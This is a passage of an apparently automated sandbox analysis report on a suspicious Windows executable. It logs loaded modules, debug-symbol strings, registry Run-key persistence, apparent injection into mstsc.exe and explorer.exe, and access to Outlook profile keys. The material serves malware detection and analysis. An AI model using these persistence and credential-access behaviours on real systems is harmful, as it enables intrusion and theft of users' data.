          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: vcruntime140.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: wininet.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: version.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: urlmon.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: msvcp140.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: iertutil.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: srvcli.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: netutils.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile written: C:\Users\user\AppData\Roaming\260P27U-\260logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8610000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.CSharp.pdb& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE861C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb4M source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mstsc.pdbGCTL source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: mstsc.pdb source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: firefox.pdb source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: #U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: firefox.pdbP source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: iexplore.pdbUGP source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: Binary string: gpC:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.CSharp.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbm source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb(s source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp, #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbexe source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb.Ac source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbion~HC source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Drawing.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb2, T source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbtime@H] source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: iexplore.pdb source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: 0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0040B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary,6_2_0040B05F
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8BE458 push edi; ret 0_2_00007FFD9B8BE45E
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B00BD pushad ; iretd 0_2_00007FFD9B8B00C1
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B07B5 push eax; ret 0_2_00007FFD9B8B07EB
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8BDC65 push ebp; retf 0_2_00007FFD9B8BDC68
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B9C126C push 30000016h; retn CE3Eh0_2_00007FFD9B9C16B9
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B9C060B push esp; retf 4810h0_2_00007FFD9B9C06B2
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90FB1E push esp; retn 0000h5_2_0E90FB1F
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90FB02 push esp; retn 0000h5_2_0E90FB03
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90F9B5 push esp; retn 0000h5_2_0E90FAE7
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB19B5 push esp; retn 0000h5_2_0FAB1AE7
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB1B02 push esp; retn 0000h5_2_0FAB1B03
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB1B1E push esp; retn 0000h5_2_0FAB1B1F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00419064 push ecx; ret 6_2_00419077
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051527FA pushad ; ret 6_2_051527F9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_05151368 push eax; iretd 6_2_05151369
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0515225F pushad ; ret 6_2_051527F9

          Boot Survival

          barindex
          Creates multiple autostart registry keys
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
          Source: C:\Windows\SysWOW64\mstsc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run N2K8UFWJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run N2K8UFWJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run N2K8UFWJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003300AA IsIconic,GetWindowPlacement,GetLastError,6_2_003300AA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003360E0 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,memset,GetTitleBarInfo,GetCursorPos,6_2_003360E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00330150 IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow,6_2_00330150
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00335355 GetWindowRect,GetWindowLongW,GetWindowLongW,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement,6_2_00335355
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0033342A IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,6_2_0033342A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00334630 lstrcmpW,LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,VariantInit,VariantClear,VariantClear,GetRgnBox,OffsetRgn,VariantClear,ShowWindow,SetWindowPos,SetWindowPos,SetWindowRgn,LockWindowUpdate,6_2_00334630
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0032D66C IsIconic,GetWindowPlacement,GetWindowRect,6_2_0032D66C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00332687 DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,DefWindowProcW,6_2_00332687
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0033587D IsWindowVisible,IsIconic,6_2_0033587D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0039C997 GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos,6_2_0039C997
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0036BCF0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0036BCF0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
